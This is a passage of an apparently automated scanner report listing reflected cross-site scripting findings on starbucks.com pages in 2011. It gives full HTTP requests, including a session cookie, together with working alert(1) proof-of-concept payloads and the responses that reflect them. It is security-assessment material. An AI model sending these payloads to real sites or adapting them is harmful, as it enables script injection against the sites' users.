GET /coffee/whole-bean-coffee/africa-arabia?4774c"style%3d"x%3aexpression(alert(1))"403ec5c4484=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:14:38 GMT Connection: close Content-Length: 42063
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?4774c"style="x:expression(alert(1))"403ec5c4484=1" /> ...[SNIP]...
1.657. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/africa-arabia
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c4da"%3balert(1)//dbdcde42a66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c4da";alert(1)//dbdcde42a66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee/whole-bean-coffee/africa-arabia?2c4da"%3balert(1)//dbdcde42a66=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:14:41 GMT Connection: close Content-Length: 41968
1.658. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/asia-pacific
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4f8"style%3d"x%3aexpression(alert(1))"3b6680e832f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f4f8"style="x:expression(alert(1))"3b6680e832f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/asia-pacific?6f4f8"style%3d"x%3aexpression(alert(1))"3b6680e832f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:14:47 GMT Connection: close Content-Length: 41482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?6f4f8"style="x:expression(alert(1))"3b6680e832f=1" /> ...[SNIP]...
1.659. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/asia-pacific
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60e4f"%3balert(1)//ccc1047f29b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60e4f";alert(1)//ccc1047f29b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee/whole-bean-coffee/asia-pacific?60e4f"%3balert(1)//ccc1047f29b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:14:53 GMT Connection: close Content-Length: 41387
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47d4a"%3balert(1)//629b8d5aeec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47d4a";alert(1)//629b8d5aeec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee/whole-bean-coffee/dark-and-specialty-roast?47d4a"%3balert(1)//629b8d5aeec=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:16:17 GMT Connection: close Content-Length: 43744
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e440"style%3d"x%3aexpression(alert(1))"503f9615132 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e440"style="x:expression(alert(1))"503f9615132 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/dark-and-specialty-roast?5e440"style%3d"x%3aexpression(alert(1))"503f9615132=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:16:11 GMT Connection: close Content-Length: 43839
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?5e440"style="x:expression(alert(1))"503f9615132=1" /> ...[SNIP]...
1.662. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca7e4"style%3d"x%3aexpression(alert(1))"acb65ae86d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca7e4"style="x:expression(alert(1))"acb65ae86d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast?ca7e4"style%3d"x%3aexpression(alert(1))"acb65ae86d6=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:15:20 GMT Connection: close Content-Length: 40353
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast?ca7e4"style="x:expression(alert(1))"acb65ae86d6=1"/> ...[SNIP]...
1.663. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a6b9"style%3d"x%3aexpression(alert(1))"d5a41dc5583 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a6b9"style="x:expression(alert(1))"d5a41dc5583 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast?1a6b9"style%3d"x%3aexpression(alert(1))"d5a41dc5583=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:15:22 GMT Connection: close Content-Length: 40708
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast?1a6b9"style="x:expression(alert(1))"d5a41dc5583=1"/> ...[SNIP]...
1.664. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/latin-america
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eff70"style%3d"x%3aexpression(alert(1))"6f0990795c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eff70"style="x:expression(alert(1))"6f0990795c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/latin-america?eff70"style%3d"x%3aexpression(alert(1))"6f0990795c7=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:15:01 GMT Connection: close Content-Length: 46735
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?eff70"style="x:expression(alert(1))"6f0990795c7=1" /> ...[SNIP]...
1.665. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/latin-america
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9edbf"%3balert(1)//c0d90c55a41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9edbf";alert(1)//c0d90c55a41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee/whole-bean-coffee/latin-america?9edbf"%3balert(1)//c0d90c55a41=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:15:14 GMT Connection: close Content-Length: 46640
1.666. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/multi-region-blends
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4325"style%3d"x%3aexpression(alert(1))"db73de7f50b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4325"style="x:expression(alert(1))"db73de7f50b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/whole-bean-coffee/multi-region-blends?f4325"style%3d"x%3aexpression(alert(1))"db73de7f50b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:15:36 GMT Connection: close Content-Length: 42978
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?f4325"style="x:expression(alert(1))"db73de7f50b=1" /> ...[SNIP]...
1.667. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee/multi-region-blends
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3a82"%3balert(1)//5ab9813aafa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3a82";alert(1)//5ab9813aafa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee/whole-bean-coffee/multi-region-blends?d3a82"%3balert(1)//5ab9813aafa=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:15:39 GMT Connection: close Content-Length: 42883
1.668. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 124ea"%3balert(1)//bd639cab20c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 124ea";alert(1)//bd639cab20c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffeehouse?124ea"%3balert(1)//bd639cab20c=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:10:59 GMT Connection: close Content-Length: 52656
1.669. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3df34"style%3d"x%3aexpression(alert(1))"fb0a4a5b623 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3df34"style="x:expression(alert(1))"fb0a4a5b623 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse?3df34"style%3d"x%3aexpression(alert(1))"fb0a4a5b623=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:10:56 GMT Connection: close Content-Length: 52751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse?3df34"style="x:expression(alert(1))"fb0a4a5b623=1" /> ...[SNIP]...
1.670. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/community
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fa72"style%3d"x%3aexpression(alert(1))"5a47d7b77de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fa72"style="x:expression(alert(1))"5a47d7b77de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/community?9fa72"style%3d"x%3aexpression(alert(1))"5a47d7b77de=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:12:38 GMT Connection: close Content-Length: 41639
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/community?9fa72"style="x:expression(alert(1))"5a47d7b77de=1" /> ...[SNIP]...
1.671. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/community/mystarbucksidea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49dde"style%3d"x%3aexpression(alert(1))"e7346a933d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 49dde"style="x:expression(alert(1))"e7346a933d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/community/mystarbucksidea?49dde"style%3d"x%3aexpression(alert(1))"e7346a933d9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:13:15 GMT Connection: close Content-Length: 41683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/community/mystarbucksidea?49dde"style="x:expression(alert(1))"e7346a933d9=1"/> ...[SNIP]...
1.672. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/entertainment
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f184b"style%3d"x%3aexpression(alert(1))"96125b2cebe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f184b"style="x:expression(alert(1))"96125b2cebe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
